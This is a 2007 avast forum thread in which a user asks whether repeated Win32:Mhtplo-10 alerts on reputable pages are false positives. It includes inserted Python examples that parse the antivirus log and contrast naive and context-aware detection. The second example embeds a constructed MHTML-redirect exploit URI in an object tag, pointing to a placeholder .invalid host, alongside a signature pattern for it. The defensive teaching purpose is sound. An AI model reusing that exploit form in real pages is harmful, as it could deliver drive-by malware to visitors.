Win32:Mhtplo-10 [Trj] - False positive? Please help!


SteveO29 (Guest)
Win32:Mhtplo-10 [Trj] - False positive? Please help!
« on: November 30, 2007, 05:26:38 AM »
Hello,

I hope someone here could help shed some light on an incident that happened to me.

While browsing the web, I received this alert from Avast!

--------------------------------------

11/29/2007 8:48:08 PM   SYSTEM   1412   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://forums.digitaltrends.com/archive/index.php/t-4230.html\unp137460016" file. 

11/29/2007 8:48:33 PM   SYSTEM   1412   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\I4GUG4E9\t-4230[1].htm" file. 

--------------------------------------

The prompt told me not to panic and to move the file to the virus chest. But when I tried, I got another prompt from Avast! telling me that the file was in use and that I was not able to move the file to the chest. So I clicked "no action". I then shut down my browser and scanned the folder where the trojan was found, and it was found again; this time I ~was~ able to move the file to the chest.

Since then I ran another full Avast! scan, and it came up clean.
I also did a scan with AVG's Anti-Spyware and Spybot's Search and Destroy; both also came up clean.
Does this mean I have nothing to worry about?

I just have a funny feeling that this was a false positive on Avast's part because I've gone to the Digital Trends site before and it seems like a reputable site. Could someone tell me if this site was really infected with this trojan?

Any replies would be greatly appreciated!

Lisandro (Avast team)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #1 on: November 30, 2007, 12:34:33 PM »
Quote from: SteveO29
Does this mean I have nothing to worry about?

Most probably. I will just suggest:
1. avast boot-time scanning.
2. Install and run SuperAntispyware and/or SpywareTerminator.

Quote from: SteveO29
I just have a funny feeling that this was a false positive on Avast's part because I've gone to the Digital Trends site before and it seems like a reputable site. Could someone tell me if this site was really infected with this trojan?

Do you still have the file in your computer? You can submit it to Jotti.
Although it seems clean...
The best things in life are free.

SteveO29 (Guest)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #2 on: November 30, 2007, 05:59:07 PM »
Thank you SO very much for the reply Tech! This had me worried for most of the night.

Quote from: Tech
Most probably. I will just suggest:
1. avast boot time scanning.
2. Install and run SuperAntispyware and/or SpywareTerminator.

Well, I did a full thorough scan with Avast! and nothing showed up.
And I also ran scans with AVG's Anti-Spyware and Spybot's Search and Destroy, and those scans were also negative.
Is it really necessary to try yet another Anti-Spyware program?

Quote from: Tech
Do you still have the file in your computer? You can submit it to Jotti.
Although it seems clean...

Well it's still in Avast's virus chest. I'm not sure how I would take it out to send it to Jotti.

I did a quick search on this forum and found this post.

http://forum.avast.com/index.php?topic=20580.0

What happened to this person seems to be the same thing that happened to me, except his alert was a warning for Win32.Mhtplo-30 [trj], whereas mine was an alert for Win32:Mhtplo-10 [trj]. I noticed at the end of this thread someone said..

Quote from: Delta
the file name was t,19100[1].htm.

I wouldn't worry about it; it is an obvious FP

The name of my file is 4-230[1].htm which is very similar. Is there any way I can be certain this is a false positive?

Lisandro (Avast team)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #3 on: November 30, 2007, 06:22:41 PM »
Quote from: SteveO29
Is it really necessary to try yet another Anti-Spyware program?

It's up to you. But a second/third opinion is not bad...

Quote from: SteveO29
Well it's still in Avast's virus chest. I'm not sure how I would take it out to send it to Jotti.

You need to extract the file (maybe to a USB drive), zip it with a password like "virus" and send it for analysis. Or send the file from the Chest with a link to this thread in the comment.

Quote from: SteveO29
Is there any way I can be certain this is a false positive?

Yes, submit it to VirusTotal (or Jotti).
The best things in life are free.

SteveO29 (Guest)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #4 on: November 30, 2007, 06:48:47 PM »
Hello Tech and thank you again for replying.

I was able to extract the file from the virus chest. I zipped up the file and submitted it to Jotti. These were the results:

Scanner                      Found
A-Squared                    nothing
AntiVir                      HTML/Exploit.Mhtml
ArcaVir                      nothing
Avast                        Win32:Mhtplo-10
AVG Antivirus                nothing
BitDefender                  nothing
ClamAV                       Exploit.HTML.MHTRedir-8
CPsecure                     Troj.Exploit.HTML.Mht
Dr.Web                       nothing
F-Prot Antivirus             nothing
F-Secure Anti-Virus          nothing
Fortinet                     nothing
Ikarus                       nothing
Kaspersky Anti-Virus         nothing
NOD32                        nothing
Norman Virus Control         nothing
Panda Antivirus              nothing
Rising Antivirus             nothing
Sophos Antivirus             nothing
VirusBuster                  nothing
VBA32                        nothing

The file is no longer on my computer; it's still in Avast's virus chest. And as I said before, all scans come up clean. Do I have anything to worry about?

SteveO29 (Guest)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #5 on: November 30, 2007, 07:04:39 PM »
I had this warning yet again!

While searching for information on Google for Mhtplo-10, the same warning came up.

This simply HAS to be a false positive; how can this alert come up from doing a Google search?

This is from my Avast! log.

-------------------------------------------------------------------------

11/30/2007 11:54:03 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://www.google.com/search?q=Win32:Mhtplo&hl=en&start=10&sa=N\unp266340129" file.
 
11/30/2007 11:54:13 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\9I66EBDU\search[1].htm" file.
 
11/30/2007 11:54:40 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://www.google.com/search?q=Win32:Mhtplo&hl=en&start=10&sa=N\unp3580908" file.
 
11/30/2007 11:54:41 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\9I66EBDU\search[2].htm" file. 
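The four log lines above are the raw material for the question this post asks: are these four alerts four different things, or one page scanned twice? The following is an added example (mine, not code from avast or from anyone in this thread) that parses avast's log format exactly as it appears here, separates in-flight Web Shield hits (a URL with a \unpNNN suffix) from the copy that IE wrote to Temporary Internet Files, and pairs each cache hit with the Web Shield hit that preceded it. The sample lines are the ones quoted in the post. Treating \unpNNN as avast's marker for an unpacked sub-object of the stream, and pairing by PID and a time window, are my assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the four avast log lines quoted in the post above.
SAMPLE_LOG = r"""
11/30/2007 11:54:03 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://www.google.com/search?q=Win32:Mhtplo&hl=en&start=10&sa=N\unp266340129" file.
11/30/2007 11:54:13 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\9I66EBDU\search[1].htm" file.
11/30/2007 11:54:40 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://www.google.com/search?q=Win32:Mhtplo&hl=en&start=10&sa=N\unp3580908" file.
11/30/2007 11:54:41 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\9I66EBDU\search[2].htm" file.
"""

# One detection record per line: timestamp, account, PID, signature, object.
LINE_RE = re.compile(
    r'^(?P<ts>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M)\s+'
    r'(?P<user>\S+)\s+(?P<pid>\d+)\s+'
    r'Sign of "(?P<sig>[^"]+)" has been found in "(?P<obj>.+)" file\.\s*$'
)
# Assumption: the trailing \unpNNN marks a sub-object avast unpacked from the
# stream; stripping it recovers the URL the Web Shield was scanning.
UNP_RE = re.compile(r'\\unp\d+$')


def parse_log(text):
    """Return one dict per detection line, tagged by where the object lived."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a detection record (blank line, other message)
        obj = m['obj']
        if obj.lower().startswith(('http://', 'https://')):
            kind, source = 'webshield', UNP_RE.sub('', obj)   # scanned in flight
        elif 'temporary internet files' in obj.lower():
            kind, source = 'cache', obj                       # browser cache copy
        else:
            kind, source = 'disk', obj                        # any other file
        events.append({
            'ts': datetime.strptime(m['ts'], '%m/%d/%Y %I:%M:%S %p'),
            'pid': int(m['pid']), 'sig': m['sig'],
            'kind': kind, 'source': source, 'raw': obj,
        })
    return events


def pair_cache_hits(events, window_seconds=60):
    """Link each cache hit to the latest preceding Web Shield hit with the same
    signature and PID inside the window. Assumption: such a pair is the same
    content detected twice (on the wire, then again when IE wrote it to cache)."""
    pairs = []
    for cache in (e for e in events if e['kind'] == 'cache'):
        earlier = [w for w in events
                   if w['kind'] == 'webshield' and w['sig'] == cache['sig']
                   and w['pid'] == cache['pid']
                   and timedelta(0) <= cache['ts'] - w['ts'] <= timedelta(seconds=window_seconds)]
        if earlier:
            pairs.append((max(earlier, key=lambda w: w['ts']), cache))
    return pairs


def summarize(events):
    """Collapse the log into the questions that matter for triage."""
    pairs = pair_cache_hits(events)
    paired_cache = {id(c) for _, c in pairs}
    return {
        'signatures': sorted({e['sig'] for e in events}),
        'urls': sorted({e['source'] for e in events if e['kind'] == 'webshield'}),
        'cache_files': sorted({e['source'] for e in events if e['kind'] == 'cache'}),
        'unexplained_cache_hits': [e['source'] for e in events
                                   if e['kind'] == 'cache' and id(e) not in paired_cache],
        'disk_hits': [e['source'] for e in events if e['kind'] == 'disk'],
    }


if __name__ == '__main__':
    for key, value in summarize(parse_log(SAMPLE_LOG)).items():
        print(f'{key}: {value}')
```

Run against these four lines the summary shows one signature, one URL (the same Google results page fetched twice), two cache files each explained by the Web Shield hit a few seconds before it, and no hit on any file outside the browser cache. That is the shape of "one page, scanned on the wire and again on disk", not of an infection that has spread; a hit under disk_hits or an unexplained cache hit would be the thing to chase.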

Lisandro (Avast team)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #6 on: November 30, 2007, 07:48:26 PM »
Now I'm not so sure it's not an exploit, and you should stay away from this file. But it could also be a false positive.
Can you submit it to Virustotal?

VirusTotal is the best, in our opinion, because:
1) It uses the Windows versions of the AVs, so avast has more unpackers for Windows, and that is the version most are using.
2) There are 27 different scanning engines, more than the others have.
3) It also has an email submission option for periods when they are busy, and you get a reply.
4) It can queue the submission and you can carry on browsing; you will eventually (not too long) get your result displayed.
The best things in life are free.

SteveO29 (Guest)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #7 on: November 30, 2007, 08:42:14 PM »

Hello Tech

Thank you so much for taking the time to answer my questions!

Yes, I will try VirusTotal.

But I'm curious, I can see an alert like this popping up when I'm browsing unknown sites. But to see this alert pop up when I'm on a Google search page or when I'm at other reputable sites like Digital Trends just doesn't make sense.

Even if I submit these .htm files to VirusTotal and they come up positive, isn't it still possible that they could be a false positive? I mean, the .htm file could contain lines that make it ~look~ like a trojan when in fact it's not. Why else would Avast detect this trojan on a Google search page? I didn't even click any links on it. It was even detected as a trojan by 4 of the virus detectors on Jotti, though the majority of them found nothing.

Isn't it possible that the Web Shield is just a bit sensitive?

Also, IF my computer does have this Win32:Mhtplo-10 [trj], what would happen? My computer is acting fine and I don't see any unusual processes running. And the files in question are still in the Avast! virus chest.

Lisandro (Avast team)
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #8 on: November 30, 2007, 10:19:03 PM »
Quote from: SteveO29
But I'm curious, I can see an alert like this popping up when I'm browsing unknown sites. But to see this alert pop up when I'm on a Google search page or when I'm at other reputable sites like Digital Trends just doesn't make sense.

Yes it does... at least, it could make sense.
http://forum.avast.com/index.php?topic=31730.0
http://forum.avast.com/index.php?topic=29160.0

Quote from: SteveO29
Even if I submit these .htm files to VirusTotal and they come up positive, isn't it still possible that they could be a false positive? I mean, the .htm file could contain lines that make it ~look~ like a trojan when in fact it's not. Why else would Avast detect this trojan on a Google search page? I didn't even click any links on it.

WebShield detects viruses on the fly, before saving files to your disk, before you click...
About being sure: there is no "sure", but depending on VirusTotal results we can make a good guess.

Quote from: SteveO29
Also, IF my computer does have this Win32:Mhtplo-10 [trj], what would happen? My computer is acting fine and I don't see any unusual processes running. And the files in question are still in the Avast! virus chest.

If it is an avast false positive, no problem, you can restore the files later.
If it is a real infection, no problem, it is already in the Chest.
The best things in life are free.
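Reply #7 asks how a Google results page or a reputable forum archive could trip the same detection as an exploit page, and Reply #8 answers that it can. The added example below (mine, not avast's code and not from anyone in this thread) shows one mechanism that fits the Jotti names above (HTML/Exploit.Mhtml, Exploit.HTML.MHTRedir-8): a signature that matches raw bytes fires on any page that merely quotes the exploit URI, including a search snippet or a forum post that reproduces it as escaped text, whereas a check that asks whether the browser would actually act on the URI does not. The pattern ms-its:mhtml:file:// is my assumption of the kind of string an MHTML-redirect detection keys on, not avast's real signature; the page contents are constructed, every host is .invalid, and no referenced file exists.

```python
import re
from html.parser import HTMLParser

# Assumed signature content (not taken from avast): the MHTML-redirect URI form
# ms-its:mhtml:file://...!http://...::/... that the MHTRedir family of
# detections is named after. A real engine's pattern is not known here.
PATTERN = re.compile(r'ms-its:mhtml:file://', re.IGNORECASE)

# Constructed pages; every host is .invalid and no file referenced exists.
EXPLOIT_PAGE = (
    '<html><body><object data="ms-its:mhtml:file://C:\\nosuch.mht!'
    'http://example.invalid/x.chm::/x.htm" type="text/x-scriptlet"></object>'
    '</body></html>'
)
SEARCH_PAGE = (  # a search-results page quoting the exploit as escaped text
    '<html><body><h3>Win32:Mhtplo - false positive?</h3>'
    '<p class="snippet">... the page had &lt;object data=&quot;'
    'ms-its:mhtml:file://C:\\x.mht!http://example.invalid/x.chm::/x.htm&quot;&gt; ...</p>'
    '</body></html>'
)
FORUM_PAGE = (  # a thread archive quoting it inside <code>
    '<html><body><code>&lt;object data="ms-its:mhtml:file://C:\\x.mht!'
    'http://example.invalid/x.chm::/x.htm"&gt;</code></body></html>'
)
CLEAN_PAGE = '<html><body><p>Nothing to see here.</p></body></html>'


def naive_scan(html):
    """Substring signature over the raw bytes: fires on any page that merely
    quotes the pattern, escaped or not."""
    return PATTERN.search(html) is not None


class ContextScanner(HTMLParser):
    """Fires only where the browser would actually act on the URI: a loadable
    attribute of an element, or script text. Escaped text, comments and
    ordinary text nodes are never reported."""
    ACTIVE_ATTRS = {'src', 'data', 'href', 'codebase', 'action', 'content'}

    def __init__(self):
        super().__init__()
        self.hits = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self._in_script = True
        for name, value in attrs:
            if value and name.lower() in self.ACTIVE_ATTRS and PATTERN.search(value):
                self.hits.append((tag, name))

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and PATTERN.search(data):
            self.hits.append(('script', 'body'))


def context_scan(html):
    """Return the (element, attribute) locations where the URI is live."""
    scanner = ContextScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits


def triage(pages):
    """Per page: does the naive signature fire, and does the context check agree?"""
    return {name: {'naive': naive_scan(html), 'context': context_scan(html)}
            for name, html in pages.items()}


if __name__ == '__main__':
    pages = {'exploit': EXPLOIT_PAGE, 'search': SEARCH_PAGE,
             'forum': FORUM_PAGE, 'clean': CLEAN_PAGE}
    for name, verdict in triage(pages).items():
        print(f'{name:8s} naive={verdict["naive"]!s:5s} context={verdict["context"]}')
```

The naive scan flags three of the four pages; the context scan flags only the one whose object element would actually load the URI. The trade-off is real: the context check misses a page whose script assembles the URI at run time, so a vendor may prefer the noisy signature and accept alerts like the ones in this thread. That is why the advice here is to get a second opinion on the actual file (Jotti, VirusTotal) rather than to argue from the site's reputation.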